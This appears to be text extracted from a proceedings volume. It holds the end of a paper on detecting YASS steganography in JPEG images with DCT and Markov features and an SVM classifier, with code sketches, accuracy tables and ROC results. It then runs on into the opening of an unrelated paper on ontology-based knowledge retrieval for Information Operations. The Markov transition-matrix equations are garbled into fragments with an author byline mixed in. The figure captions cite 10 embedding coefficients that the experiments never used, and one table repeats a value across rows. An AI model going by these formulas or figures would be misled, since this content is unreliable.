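    vals = vals[(vals >= lo) & (vals <= hi)]
    hist = np.array([(vals == v).sum() for v in range(lo, hi + 1)], float)
    return hist / max(hist.sum(), 1)

def dual_histogram(dct_blocks, d, modes=MODES):
    """g^d_{ij}: for a fixed value d, count over all blocks how often
    DCT mode (i, j) equals d; only the 9 low-frequency modes are kept."""
    return np.array([(dct_blocks[:, i - 1, j - 1] == d).sum() for i, j in modes], float)
```
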

The next 6 functions capture the inter-block dependency among DCT coefficients. The first function is the<br />

variation V:<br />

V = [ Σ_{i,j=1}^{8} Σ_{k=1}^{|I_r|-1} |d_ij(I_r(k)) - d_ij(I_r(k+1))| + Σ_{i,j=1}^{8} Σ_{k=1}^{|I_c|-1} |d_ij(I_c(k)) - d_ij(I_c(k+1))| ] / ( |I_r| + |I_c| ) (3)<br />

where I_r and I_c denote the vectors of block indices 1, …, n_b while scanning the image by rows and by<br />

columns, respectively.<br />

The next two functions capture the blockiness of the image:<br />

B_α = [ Σ_{i=1}^{⌊(M-1)/8⌋} Σ_{j=1}^{N} |c_{8i,j} - c_{8i+1,j}|^α + Σ_{j=1}^{⌊(N-1)/8⌋} Σ_{i=1}^{M} |c_{i,8j} - c_{i,8j+1}|^α ] / ( N⌊(M-1)/8⌋ + M⌊(N-1)/8⌋ ) (4)<br />

where M and N are the image height and width in pixels, c_{i,j} are the grayscale values of the<br />

decompressed JPEG image, and α = 1, 2.<br />

The last set of features is the co-occurrence matrix of DCT coefficients in neighboring blocks. The<br />

co-occurrence matrix is calculated for values -2 to +2.<br />
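The blockiness functions can be written down directly from equation (4); in 0-based array indexing the boundary pair c_{8i,j}, c_{8i+1,j} becomes indices 8i-1 and 8i. The function name is ours:<br />

```python
import numpy as np

def blockiness(c, alpha):
    """B_alpha: mean alpha-th power difference across the 8x8 JPEG block
    boundaries of the decompressed grayscale image c (equation (4))."""
    M, N = c.shape
    r = (M - 1) // 8              # number of horizontal block boundaries
    s = (N - 1) // 8              # number of vertical block boundaries
    horiz = sum(abs(c[8 * i - 1, j] - c[8 * i, j]) ** alpha
                for i in range(1, r + 1) for j in range(N))
    vert = sum(abs(c[i, 8 * j - 1] - c[i, 8 * j]) ** alpha
               for j in range(1, s + 1) for i in range(M))
    return (horiz + vert) / (N * r + M * s)
```
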

4.2 Markov features<br />

From each image F(u, v), we obtain the following difference matrices along the horizontal, vertical,<br />

diagonal and minor diagonal directions:<br />

F_h(u, v) = F(u, v) - F(u+1, v)<br />

F_v(u, v) = F(u, v) - F(u, v+1)<br />

F_d(u, v) = F(u, v) - F(u+1, v+1)<br />

F_m(u, v) = F(u+1, v) - F(u, v+1)<br />

where F(u, v) is the image and (u, v) gives the pixel location. To reduce the dimensionality we consider<br />

only the values [-4, +4] in these matrices: all values larger than +4 are set to +4 and all values smaller<br />

than -4 are set to -4. From these we calculate the transition matrices as follows:<br />



M<br />

M<br />

M<br />

Su−2 Sv<br />

∑∑<br />

u= 1 v=<br />

1<br />

h(,<br />

i j)<br />

=<br />

Su−1 Sv<br />

Su Sv−2<br />

∑∑<br />

u= 1 v=<br />

1<br />

Kesav Kancherla and Srinivas Mukkamala<br />

δ(<br />

Fh( u, v) = i, Fh( u+ 1, v) = j)<br />

∑∑<br />

u= 1 v=<br />

1<br />

v(,<br />

i j)<br />

=<br />

Su Sv−1<br />

Su−2 Sv−2<br />

∑ ∑<br />

u= 1 v=<br />

1<br />

δ(<br />

Fh( u, v) = i)<br />

δ(<br />

Fv( uv , ) = iF , v(<br />

uv , + 1) = j)<br />

∑∑<br />

u= 1 v=<br />

1<br />

d (, i j)<br />

=<br />

Su−1 Sv−1<br />

M<br />

Su−2 Sv−2<br />

∑∑<br />

u= 1 v=<br />

1<br />

δ(<br />

Fuv v(<br />

, ) = i)<br />

δ ( Fd( uv , ) = iF , d(<br />

u+ 1, v+ 1) = j)<br />

∑∑<br />

u= 1 v=<br />

1<br />

m(,<br />

i j)<br />

=<br />

Su−1 Sv−1<br />

u= 1 v=<br />

1<br />

δ ( Fd( u, v) = i)<br />

δ(<br />

Fm( u+ 1, v) = i, Fm( u, v+ 1) = j)<br />

∑∑<br />

δ(<br />

Fm( u, v) = i)<br />

Where Su and Sv are the dimensions of the image and δ (condition) = 1 if only if the conditions are<br />

satisfied. The final features will be the average of the above 4 transition matrix.<br />
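The horizontal case can be sketched as follows; the other three directions are analogous. The clipping threshold T = 4 follows the text, while the dense-loop implementation is our own, and it normalises over the pairs actually counted so that each occupied row of the matrix sums to 1:<br />

```python
import numpy as np

T = 4  # differences are clipped to [-T, T], giving a 9x9 transition matrix

def transition_matrix_h(F):
    """M_h(i, j): empirical probability that F_h(u+1, v) = j given
    F_h(u, v) = i, for the horizontal difference matrix
    F_h(u, v) = F(u, v) - F(u+1, v), clipped to [-T, T]."""
    Fh = np.clip(F[:-1, :].astype(int) - F[1:, :].astype(int), -T, T)
    a, b = Fh[:-1, :].ravel(), Fh[1:, :].ravel()   # consecutive pairs along u
    M = np.zeros((2 * T + 1, 2 * T + 1))
    for i in range(-T, T + 1):
        mask = (a == i)
        denom = mask.sum()
        if denom:
            for j in range(-T, T + 1):
                M[i + T, j + T] = (mask & (b == j)).sum() / denom
    return M
```
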

5. Results<br />

We used 2000 images in our experiment: 1400 images for training the SVM and 600 images for<br />

testing. Each data point consists of 274 features, of which 193 are DCT features and 81 are Markov<br />

features. We used the following parameters for embedding data with YASS:<br />

Three quality factor modes: 50/50, 50/75 and 75/75<br />

Four block sizes: 9, 10, 12 and 14<br />

Number of low-frequency DCT coefficients used for embedding: 12 (low) and 19 (high)<br />

We selected block sizes no larger than 14 because, as the block size increases, the amount of data that<br />

can be embedded decreases. We chose 19 embedding coefficients because that value is used in the<br />

YASS paper (Solanki, Sarkar and Manjunath, 2007: 16-31), and 12 to show the performance of our<br />

steganalysis scheme at low embedding rates. Table 1 and Table 2 give the accuracies obtained for the<br />

different parameters at high and low embedding rates respectively.<br />

Table 1: Accuracy obtained for different block sizes, compression rates and coefficients used equal to<br />

19<br />

Advertised-Design Compression rate/ Block Size 9 10 12 14<br />

50-50 99.8 99.7 99.75 99.7506<br />

50-75 97.1737 97.584 97.5894 96.0881<br />

75-75 97.5973 97.6725 97.0075 96.0881<br />

Table 2: Accuracy obtained for different block sizes, compression rates and coefficients used equal to<br />

12<br />

Advertised-Design Compression rate/ Block Size 9 10 12 14<br />

50-50 99.8337 99.5012 99.335 99.47<br />

50-75 96.5087 96.7581 96.84 95.59<br />

75-75 96.59 96.68 95.6775 94.55<br />

We obtained an accuracy of about 99.5% for the 50-50 setting even when we used only 12 coefficients<br />

for embedding. Accuracy decreases as the block size increases for all compression settings, because a<br />

larger block size reduces the embedding capacity. We obtained an accuracy above 95% for all settings,<br />

even with a block size of 14 and only 12 embedding coefficients. Our method performed best in the<br />

50-50 compression setting: more noise is added there due to compression, and as our method uses this<br />

noise for detection, it obtains better accuracy in that setting. In the next section we explain the model<br />

selection process and the Receiver Operating Characteristic (ROC) curves.<br />

5.1 Model selection for SVMs<br />

In any predictive learning task, such as classification, both the model and the parameter estimation<br />

method must be selected in order to achieve a high level of performance from the learning machine.<br />

Recent approaches allow a wide class of models of varying complexity to be chosen; the task of learning<br />

then amounts to selecting the model of optimal complexity and estimating its parameters from training<br />

data (Cherkassy, 2002: 109-133; Lee and Lin, 2000). Within the SVM approach, the parameters to be<br />

chosen are usually (i) the penalty term C, which determines the trade-off between the complexity of the<br />

decision function and the number of training examples misclassified; (ii) the mapping function Φ; and<br />

(iii) the kernel function K such that K(x, y) = Φ(x)·Φ(y). In the case of the RBF kernel, the width, which<br />

implicitly defines the high-dimensional feature space, is the other parameter to be selected (Chang and<br />

Lin, 2001). Figures 2 and 3 give the model graphs obtained during training.<br />
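With today's tooling, this model selection over C and the RBF width could be sketched with scikit-learn's grid search; this is our assumption (the authors used the LIBSVM tools of Chang and Lin), and the parameter grid below is illustrative only:<br />

```python
import numpy as np
from sklearn.model_selection import GridSearchCV
from sklearn.svm import SVC

def select_svm_model(X, y):
    """Pick the penalty C and the RBF kernel width gamma by 3-fold
    cross-validated grid search, mirroring the model selection of 5.1."""
    grid = {"C": [0.1, 1, 10, 100], "gamma": [0.001, 0.01, 0.1, 1]}
    search = GridSearchCV(SVC(kernel="rbf"), grid, cv=3)
    search.fit(X, y)
    return search.best_estimator_, search.best_params_
```

`GridSearchCV` refits the best (C, gamma) pair on the full training set, so the returned estimator is ready to score the held-out test images.<br />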

Figure 2: Model graph obtained during SVM training for YASS at block size 9, compression rate 50-50<br />

and 12 coefficients used for embedding<br />

Figure 3: Model graph obtained during SVM training for YASS at block size 14, compression rate 75-75<br />

and 10 coefficients used for embedding<br />



5.2 ROC curves<br />


The ROC curve is a graphical plot of the fraction of true positives (TP) versus the fraction of false<br />

positives (FP). The point (0, 1) represents the perfect classifier, since it classifies all positive and negative<br />

cases correctly. An ideal system will thus begin by identifying all the positive examples, so the curve rises<br />

to (0, 1) immediately, with a zero rate of false positives, and then continues along to (1, 1). Detection rates<br />

and false alarms were evaluated for the steganography data set and the results obtained were used to<br />

plot the ROC curves. In each of these ROC plots, the x-axis is the false alarm rate, calculated as the<br />

percentage of cover images considered to be steganograms; the y-axis is the detection rate, calculated<br />

as the percentage of steganograms detected. A data point in the upper left corner corresponds to optimal<br />

performance, i.e., a high detection rate with a low false alarm rate (Egan, 1975). Figures 4 and 5 give the<br />

ROC curves obtained during testing.<br />
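The ROC construction described above amounts to sweeping a decision threshold over the classifier scores; a self-contained sketch (function names ours):<br />

```python
import numpy as np

def roc_curve_points(scores, labels):
    """Sweep a threshold over the classifier scores and return the false
    positive rate (x-axis) and true positive rate (y-axis) at each cut."""
    order = np.argsort(-np.asarray(scores, dtype=float))
    labels = np.asarray(labels)[order]
    tps = np.cumsum(labels == 1)          # true positives at each threshold
    fps = np.cumsum(labels == 0)          # false positives at each threshold
    tpr = np.concatenate([[0.0], tps / max(tps[-1], 1)])
    fpr = np.concatenate([[0.0], fps / max(fps[-1], 1)])
    return fpr, tpr

def auc(fpr, tpr):
    """Area under the ROC curve by the trapezoidal rule."""
    fpr, tpr = np.asarray(fpr), np.asarray(tpr)
    return float(np.sum((fpr[1:] - fpr[:-1]) * (tpr[1:] + tpr[:-1]) / 2))
```
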

Figure 4: Receiver Operating Characteristic (ROC) curve obtained during steganalysis of YASS at block<br />

size 9, compression rate 50-50 and 12 coefficients used for embedding<br />

Figure 5: Receiver Operating Characteristic (ROC) curve obtained during steganalysis of YASS at block<br />

size 14, compression rate 75-75 and 10 coefficients used for embedding<br />


The accuracy of the test depends on how well the test classifies the group being tested into 0 or 1.<br />

Accuracy is measured by the area under the ROC curve (AUC): an area of 1 represents a perfect test,<br />

while an area of 0.5 represents a worthless test. In our experiments, we obtained AUC values of 0.9998<br />

and 0.9667, as shown in Figures 4 and 5.<br />

6. Conclusion<br />

In this paper we propose a steganalysis scheme for YASS. The novelty of our method is that it estimates<br />

the image using the concept of motion estimation. Experimental results show that our method is able to<br />

detect YASS even at low embedding rates, and that it detects YASS steganograms consistently with an<br />

accuracy above 99% at the 50-50 compression rate. In our approach the accuracy decreases as the<br />

block size increases, since fewer bits are embedded. As our methodology does not use any information<br />

about the steganographic scheme, it can be applied to any scheme.<br />

References<br />

Chang, C. C. and Lin, C. J. (2001), LIBSVM: a library for support vector machines, Department of Computer<br />

Science and Information Engineering, National Taiwan University.<br />

Chen, C. and Shi, Y. Q. (2008) ‘JPEG image steganalysis utilizing both intrablock and interblock correlations’,<br />

IEEE International Symposium on Circuits and Systems, pp. 3029-3032.<br />

Cherkassy V. (2002) ‘Model complexity control and statistical learning theory’, Journal of Natural Computing, Vol.<br />

1, pp. 109-133.<br />

Egan, J.P (1975), Signal detection theory and ROC analysis, New York: <strong>Academic</strong> Press.<br />

Fridrich, J. (2004) ‘Feature-based steganalysis for JPEG images and its implications for future design of<br />

steganographic schemes’, Information Hiding, <strong>6th</strong> International Workshop, LNCS 3200, pp.67-81.<br />

Kodovský, J., Pevný, T. and Fridrich, J. (2010) ‘Modern steganalysis can detect YASS’, Proceedings SPIE,<br />

Electronic Imaging, Security and Forensics of Multimedia XII, volume 7541, pp. 02–01–02–11.<br />

Lee, J. H. and Lin, C. J. (2000), Automatic model selection for support vector machines, Technical Report,<br />

Department of Computer Science and Information Engineering, National Taiwan University.<br />

Li, B., Shi, Y.Q. and Huang, J. (2008) ‘Steganalysis of YASS’, Proceedings of the 10th ACM Multimedia &<br />

Security Workshop, pp. 139–148.<br />

Lyu, S. and Farid, H. (2002) ‘Detecting hidden messages using higher order statistics and support vector<br />

machines’, Information Hiding, 5th International Workshop, LNCS 2578, pp. 340-354.<br />

Pevny, T. and Fridrich, J. (2007) ‘Merging Markov and DCT features for multi-class JPEG steganalysis’, Proc. of<br />

SPIE Electronic Imaging, Security, Steganography, and Watermarking of Multimedia Contents, volume<br />

6505, pp. 650503-1-650503-13.<br />

Pevný, T., Bas, P. and Fridrich, J. (2009) ‘Steganalysis by subtractive pixel adjacency matrix’, Proceedings of the<br />

11th ACM Multimedia & Security Workshop, pp. 75–84.<br />

Provos, N. (2001) ‘Defending against statistical steganalysis’, 10th USENIX Security Symposium, Washington<br />

DC, USA, pp. 24.<br />

Sallee, P. (2005) ‘Model based methods for steganography and steganalysis’, Int. J. Image Graphics, 5(1): 167-<br />

190.<br />

Sarkar A., Solanki, K. and Manjunath, B. S. (2008) ‘Further study on YASS: Steganography based on<br />

randomized embedding to resist blind steganalysis’, Proceedings SPIE, Electronic Imaging, Security,<br />

Forensics, Steganography, and Watermarking of Multimedia Contents, volume 6819, pages 16–31.<br />

Shi, Y. Q., Chen, C. and Chen, W. (2006) ‘A Markov process based approach to effective attacking JPEG<br />

steganography’, Information Hiding, 8th International Workshop, volume 4437, pp. 249-264.<br />

Solanki, K., Sarkar, A. and Manjunath, B. S. (2007) ‘YASS: Yet another steganographic scheme that resists blind<br />

Steganalysis’, Proceedings of 9th Information Hiding Workshop, Saint Malo, France, volume 4567, pp. 16-<br />

31.<br />

Torr, P.H.S. and Zisserman, A. (1999) ‘Feature Based Methods for Structure and Motion Estimation’, ICCV<br />

Workshop on Vision Algorithms, pp. 278-294.<br />

Westfeld, A. (2001) ‘High capacity despite better steganalysis (F5-a steganographic algorithm)’, Information<br />

Hiding, 4th International Workshop, LNCS 2137, pp. 289-302.<br />



Developing a Knowledge System for Information<br />

Operations<br />

Louise Leenen, Ronell Alberts, Katarina Britz, Aurona Gerber and Thomas<br />

Meyer<br />

Council for Scientific and Industrial Research, Pretoria, South Africa<br />

lleenen@csir.co.za<br />

ralberts@csir.co.za<br />

abritz@csir.co.za<br />

agerber@csir.co.za<br />

tmeyer@csir.co.za<br />

Abstract: In this paper we describe a research project to develop an optimal information retrieval system in an<br />

Information Operations domain. Information Operations is the application and management of information to gain<br />

an advantage over an opponent and to defend one’s own interests. Corporations, governments, and military<br />

forces are facing increasing exposure to strategic information-based actions. Most national defence and security<br />

organisations regard Information Operations as both a defensive and offensive tool, and some commercial<br />

institutions are also starting to recognise the value of Information Operations. An optimal information retrieval<br />

system should have the capability to extract relevant and reasonably complete information from different<br />

electronic data sources which should decrease information overload. Information should be classified in a way<br />

such that it can be searched and extracted effectively. The authors of this paper have completed an initial phase<br />

in the investigation and design of a knowledge system that can be used to extract relevant and complete<br />

knowledge for the planning and execution of Information Operations. During this initial phase of the project, we<br />

performed a needs analysis and a problem analysis, and our main finding is a recommendation to use<br />

logic-based ontologies: they have unambiguous semantics, facilitate intelligent search, provide an optimal<br />

trade-off between expressivity and complexity, and yield optimal recall of information. The risk of adopting<br />

this technology lies in its status as an emerging technology, and we therefore include recommendations<br />

for the development of a prototype system.<br />

Keywords: information operations, knowledge representation, ontology, query language<br />

1. Introduction<br />

Businesses, governments, and military forces are increasingly reliant on the effective management of<br />

vast sources of electronic information. The type of information can be documents, images, maps, or<br />

other formats. These data sources can be used in Information Operations (IO).<br />

McCrohan (McCrohan 1998) defines IO as “actions taken to create an information gap in which we<br />

possess a superior understanding of a potential adversary’s political, economic, military, and<br />

social/cultural strengths, vulnerabilities, and interdependencies than our adversary possesses of us”.<br />

All institutions that rely on information are facing increasing exposure to strategic information-based<br />

actions, and need to consider systems security. Most national defence and security organisations<br />

regard IO as both a defensive and an offensive tool, and some commercial institutions are starting to<br />

recognise the value of IO. In any competitive environment, an institution has to protect its strategies<br />

from competitors and gather information regarding its competitors’ objectives and plans. IO includes<br />

competitive intelligence, security against the efforts of competitors, the use of competitive deception,<br />

and the use of psychological operations (McCrohan 1998).<br />

The aim of an efficient information retrieval system is to support institutions in planning IO. Information<br />

has to be represented in a knowledge system in such a way that computers can process it, retrieve it,<br />

and draw conclusions from existing knowledge. Information should be classified in a way that it can be<br />

searched and extracted effectively.<br />

We present the main decisions required in the investigation and design of a knowledge system that<br />

can be used to extract relevant and complete knowledge for the planning and execution of IO and<br />

give a motivation for our main recommendation: the use of logic-based ontologies in a knowledge<br />

system for IO.<br />




2. Intelligent knowledge retrieval methods and technologies

We describe appropriate technologies for intelligent search and retrieval of information over a range of different sources and types. The operative word here is intelligent, focussing on methods that will ensure maximum recall with a high level of fidelity. In other words, the aim is to get as close as is currently feasible to the ideal situation in which all and only relevant information is returned. In order to do so, it is necessary to be more precise about what it means for information to be relevant. The most important step in this direction is the distinction between syntactic and semantic relevance.

Syntactic relevance refers to search based on the syntactic structure of the entities to be searched, while semantic relevance is concerned with the underlying meaning of the syntactic objects being represented. Search based on syntactic relevance can be better or worse depending on the flexibility built into the search mechanisms, but it provides only a very limited and restricted form of intelligence. To perform intelligent search in any true sense of the word, it is necessary to make use of some version of semantic relevance.

The basic assumption is that information can be accessed electronically. Information in this sense is defined very broadly: it can refer to data entries stored in database systems or in more sophisticated structures. It can also refer to electronic documents, images in any of the known formats, or any of the other numerous resources that can be stored electronically. The main reason why such a broad definition is possible is that the methods detailed in this survey allow a clean separation between information, the structures employed to store the information, and the methods used to access the information.

2.1 Query languages

2.1.1 Boolean combinations of keywords

Keyword search is an established technology (Kalyanpur et al. 2006). The simplest form uses a list of keywords with the intention of locating information containing all the keywords in the list. More flexible keyword searches can be performed using Boolean operators such as AND, OR and NOT. This kind of query language cannot be used in database-style structures. A second difficulty is that searches become complex when there are large numbers of keyword hits.
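The Boolean query mechanism described above can be sketched in a few lines. The documents, keywords, and the tuple encoding of operators below are purely illustrative, not part of any particular retrieval system.

```python
# Sketch: Boolean keyword search over a small in-memory corpus.
# Documents and keywords are invented for the example.

def matches(doc_words, query):
    """Evaluate a Boolean query tree against a set of words.

    A query is either a keyword string or a tuple:
    ("AND", q1, q2), ("OR", q1, q2), or ("NOT", q).
    """
    if isinstance(query, str):
        return query in doc_words
    op = query[0]
    if op == "AND":
        return matches(doc_words, query[1]) and matches(doc_words, query[2])
    if op == "OR":
        return matches(doc_words, query[1]) or matches(doc_words, query[2])
    if op == "NOT":
        return not matches(doc_words, query[1])
    raise ValueError(f"unknown operator: {op}")

docs = {
    "d1": "information operations rely on timely intelligence",
    "d2": "competitive intelligence and deception in operations",
    "d3": "database indexing techniques",
}
query = ("AND", "intelligence", ("NOT", "deception"))
hits = [d for d, text in docs.items() if matches(set(text.split()), query)]
print(hits)  # documents containing "intelligence" but not "deception"
```

The second difficulty noted above shows up directly here: as the hit list grows, the user must keep adding NOT and AND clauses by hand to narrow it.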

2.1.2 Logic-based query languages

The use of logic-based languages is pervasive in database systems. It has its origins in languages such as SQL and later extensions such as the query languages for Datalog (Ceri et al. 1989) and logic programming (Lloyd 1987). These languages are all fragments of first-order logic (Ben-Ari 2008). In addition to the Boolean operators discussed in the previous section, these query languages also allow the use of variables, existential quantification (exists), universal quantification (for all), and function symbols, and combinations of these additions in a manner reminiscent of the recursive definition in the previous section. This allows us to express complex queries such as:

“Find all countries in Africa with a per capita income of at most $X, and with a military-style government, or where there is no adherence to human rights”.

The main advantages of these types of query languages are that they allow much more complex queries, can express queries about concepts as well as individuals, and are applicable to information contained in database-style structures as well as electronic documents. However, the cost of processing such queries can be very high, and grows with their complexity. It is therefore good practice to limit the expressivity of a chosen query language to precisely what is necessary, in order to maximise the efficiency of query processing.
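To make the example query concrete, the sketch below evaluates it over a hypothetical fact base. The country records are invented, and the grouping of the English conditions as income AND (military-style government OR no human rights) is our own reading of the query.

```python
# First-order-style query over a small fact base. All data are
# illustrative; no real countries are described.

countries = [
    {"name": "A", "region": "Africa", "income": 800,  "military_govt": True,  "human_rights": True},
    {"name": "B", "region": "Africa", "income": 1500, "military_govt": False, "human_rights": False},
    {"name": "C", "region": "Africa", "income": 3000, "military_govt": False, "human_rights": True},
    {"name": "D", "region": "Europe", "income": 900,  "military_govt": False, "human_rights": False},
]

def find_countries(x_threshold):
    """Countries in Africa with per capita income <= X, and either a
    military-style government or no adherence to human rights."""
    return [c["name"] for c in countries
            if c["region"] == "Africa"
            and c["income"] <= x_threshold
            and (c["military_govt"] or not c["human_rights"])]

print(find_countries(2000))
```

A Datalog or SQL engine would evaluate the same condition declaratively; the list comprehension simply spells out the quantification over the fact base.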

2.2 Information types

It is useful to assume that information is tagged with the relevant components to be matched with queries. This assumption enables us to reduce the original question to a decision about how a piece of information should be tagged. A tag is a keyword associated with a piece of information. The purpose of a tag is to describe an item and to enable an electronic search to find it.

We distinguish between using text or keywords as tags, and between information contained in database-style structures and information contained in electronic documents.

2.2.1 Text as tags

In the case of information contained in database-style structures, the only practical option is to view the information itself as its own tag. In the case of electronic documents, the simplest form of tagging is the brute-force approach of using the raw text contained in a document. In a sense the document is tagged with all of its textual content. The advantage of such an approach is that it is relatively simple to implement, but this simplicity comes with high levels of inaccuracy. In particular, this approach is bound to lead to many false positives, and it does not guarantee that all relevant documents will be located. The main problem is that this is a purely syntactic approach. There is no attempt to tag documents with keywords related to the meaning of the document, and there is therefore no guarantee that the tags will be truly relevant to its content.

2.2.2 Keywords as tags

In contrast with using text as tags, the practice of tagging information with appropriate keywords allows a much more flexible approach. The goal is to tag documents with keywords that are clearly relevant to the meaning of the document, ideally with all and only the relevant keywords. The primary issue to be resolved is how to decide on the relevant keywords.

Tagging can take one of three forms: manual tagging, semi-automated tagging, or automated tagging (Buitelaar, Cimiano 2008; Buitelaar, Magnini 2005). Current techniques are relatively good at picking out keywords related to concepts and individuals, but much work still needs to be done on keywords related to relationships between concepts or individuals.

Manual tagging is a good starting point; however, using only manual tagging is usually not feasible, due to factors such as time constraints and the availability of domain experts. A better approach is to interleave processes for manual, semi-automated and automated tagging of documents. Automated tagging is faster but less accurate, whereas semi-automated tagging provides better results but is more time-consuming to set up. Keep in mind that the results obtained even from manual tagging are only as good as the knowledge applied by the person(s) performing the tagging.

The good news is that tagging lends itself to an incremental approach. One can start with a fairly coarse-grained tagging methodology and refine it over time.
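As a rough illustration of the coarse-grained end of automated tagging, the sketch below tags a document with its most frequent content words. Real systems, such as the approaches surveyed by Buitelaar and Cimiano, use far richer linguistic processing; the stopword list and document here are stand-ins.

```python
# Minimal automated tagger: the top-k most frequent non-stopword terms.
from collections import Counter

STOPWORDS = {"the", "a", "of", "and", "to", "in", "is", "for", "over"}

def auto_tags(text, k=3):
    # Crude normalisation: lowercase and strip trailing punctuation.
    words = [w.strip(".,").lower() for w in text.split()]
    counts = Counter(w for w in words if w and w not in STOPWORDS)
    return [w for w, _ in counts.most_common(k)]

doc = ("Ontologies structure information for a domain. "
       "Ontologies attach meaning to terms, and reasoning over "
       "ontologies supports intelligent retrieval of information.")
print(auto_tags(doc))
```

Refining the stopword list, adding lemmatisation, or weighting terms against a background corpus are exactly the kinds of incremental improvements the text describes.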

2.3 Information retrieval methods

2.3.1 Direct retrieval

Direct retrieval is concerned with methods for extracting explicitly stored information as efficiently as possible. This is the kind of retrieval, based on indexing techniques, that one would obtain from traditional database systems and from keyword searches based on syntactic relevance (Gray, Reuter 1992; Kroenke 1997). In the case of direct document retrieval, keywords in a query are identified and matched directly with the keywords used to tag the document.

Direct retrieval techniques are firmly established and are able to deal efficiently with huge amounts of information. The only drawback is the restriction on the type of information that can be extracted: it has to be stored explicitly in some form.
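Direct retrieval by indexing can be illustrated with a toy inverted index, where each tag maps to the set of documents carrying it, so that lookups avoid scanning every document. The document names and tags are invented for the example.

```python
# Inverted index for direct retrieval over tagged documents.
from collections import defaultdict

def build_index(tagged_docs):
    index = defaultdict(set)
    for doc_id, tags in tagged_docs.items():
        for tag in tags:
            index[tag].add(doc_id)
    return index

tagged = {
    "report1": {"sanctions", "trade"},
    "report2": {"trade", "infrastructure"},
    "report3": {"sanctions"},
}
index = build_index(tagged)

# A conjunctive query intersects the posting sets of its keywords.
result = index["sanctions"] & index["trade"]
print(sorted(result))  # ['report1']
```

Note that only explicitly assigned tags are ever found, which is exactly the limitation the text identifies.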

2.3.2 Indirect retrieval

A more sophisticated approach is to employ some kind of indirect retrieval, where the task is to match the keywords identified in the query not just with the exact keywords with which a document is tagged, but also with related keywords. The hard part is determining what constitutes being related. Standard approaches to indirect document retrieval are mostly still syntax-based:

- The use of synonyms, using resources such as WordNet (http://wordnet.princeton.edu/) (Fellbaum 1998).
- Lemmatisation, the process of grouping together the different inflected forms of a word so they can be analysed as a single item (Brown 1993). For example, the verb “to walk” may appear as “walk”, “walked”, “walks”, “walking”. The base form, “walk”, is called the lemma of the word.
- Stemming, which is closely related to lemmatisation but operates on a single word without contextual information. Related words should map to the same stem, but the stem does not have to be a valid root.
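The three syntax-based techniques above can be combined in a small sketch: query keywords are reduced to crude stems and expanded with synonyms before matching. The hand-built synonym table stands in for a resource such as WordNet, and the suffix-stripping rule stands in for a proper stemmer; both are illustrative only.

```python
# Indirect (still syntactic) retrieval via stemming + synonym expansion.

SYNONYMS = {"walk": {"stroll", "march"}}  # toy stand-in for WordNet

def stem(word):
    # Naive suffix stripping; a real system would use e.g. Porter's stemmer.
    for suffix in ("ing", "ed", "s"):
        if word.endswith(suffix) and len(word) > len(suffix) + 2:
            return word[: -len(suffix)]
    return word

def expand(keyword):
    base = stem(keyword)
    return {base} | SYNONYMS.get(base, set())

def retrieve(query_word, docs):
    terms = expand(query_word)
    return [d for d, text in docs.items()
            if terms & {stem(w) for w in text.lower().split()}]

docs = {"d1": "they walked home", "d2": "a long march north", "d3": "driving south"}
print(retrieve("walking", docs))
```

The query "walking" now matches both an inflected form ("walked") and a synonym ("march"), even though neither document contains the literal query word.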

A more nuanced version of indirect document retrieval involves structures able to capture and represent sophisticated relationships between entities. The most sophisticated versions of indirect retrieval employ methods for performing inference of some kind: indirect retrieval then also covers information that can be inferred from what is stored explicitly.

The most appropriate technology for indirect information retrieval is that based on ontologies (Staab, Studer 2004). The following definition of an ontology is taken from Wikipedia (http://en.wikipedia.org/wiki/Ontology_(information_science)): “an ontology is a formal representation of a set of concepts within a domain and the relationships between those concepts. It is used to reason about the properties of that domain, and may be used to define the domain”.

In addition to facilitating the hierarchical structuring of information from a domain of discourse, ontologies also provide the means to impose a whole variety of other constraints, which makes them a very powerful method for representing concepts, individuals, and the relationships between them. The use of logic-based ontologies is particularly apt, since it provides the means for employing powerful and efficient mechanisms for performing inference.
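As a minimal illustration of why inference matters for retrieval, the toy sketch below computes the transitive closure of subclass axioms, so that a query for one concept also returns instances of its subconcepts. The concept names and documents are invented; a real system would use a DL reasoner rather than this hand-rolled closure.

```python
# Toy logic-based ontology: subclass axioms plus instance assertions.
# Retrieving all "Vehicle" documents must infer that a Truck is a
# Vehicle even though no document is tagged "Vehicle" directly.

SUBCLASS = {("Truck", "MotorVehicle"), ("MotorVehicle", "Vehicle"),
            ("Bicycle", "Vehicle")}
INSTANCES = {"doc_convoy": "Truck", "doc_cycle": "Bicycle",
             "doc_budget": "Report"}

def superclasses(concept):
    """All concepts subsuming `concept`, via the transitive closure."""
    result, frontier = set(), {concept}
    while frontier:
        c = frontier.pop()
        for sub, sup in SUBCLASS:
            if sub == c and sup not in result:
                result.add(sup)
                frontier.add(sup)
    return result

def instances_of(concept):
    return sorted(d for d, c in INSTANCES.items()
                  if c == concept or concept in superclasses(c))

print(instances_of("Vehicle"))  # doc_convoy and doc_cycle, by inference
```

A purely direct (syntactic) index would return nothing for "Vehicle" here, since no document carries that tag explicitly.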

2.4 Ontologies and ontology-based engineering

In the past fifteen years, advances in technology have ensured that access to vast amounts of data is no longer a significant problem. Paradoxically, this abundance of data has led to a problem of information overload, making it increasingly difficult to locate relevant information. The technology of choice at present is keyword search, although many argue that this is already delivering diminishing returns, as Figure 1 below by Nova Spivack (Spivack 2007) indicates. Spivack illustrates how keyword search is becoming less effective as the Web increases in size. The broken line shows that the productivity of keyword search has reached a plateau and its efficiency will decrease in future, while the dotted line plots the expected growth of the Web.

Any satisfactory solution to this problem will have to involve ways of making information machine-processable, a task which is only possible if machines have better access to the semantics of the information. It is here that ontologies play a crucial role. Roughly speaking, an ontology structures information in ways that are appropriate for a specific application domain, and in doing so provides a way to attach meaning to the terms and relations used in describing the domain. A more formal, and widely used, definition is that of Gruber (Gruber 1993), who defines an ontology as a formal specification of a conceptualisation.

The importance of this technology is evidenced by the growing use of ontologies in a variety of application areas, and is in line with the view of ontologies as the emerging technology driving the Semantic Web initiative (Berners-Lee et al. 2001). The construction and maintenance of ontologies greatly depend on the availability of ontology languages equipped with a well-defined semantics and powerful reasoning tools. Fortunately there already exists a class of logics, called Description Logics (DLs), that provide both, and these are therefore ideal candidates for ontology languages (Baader et al. 2003).

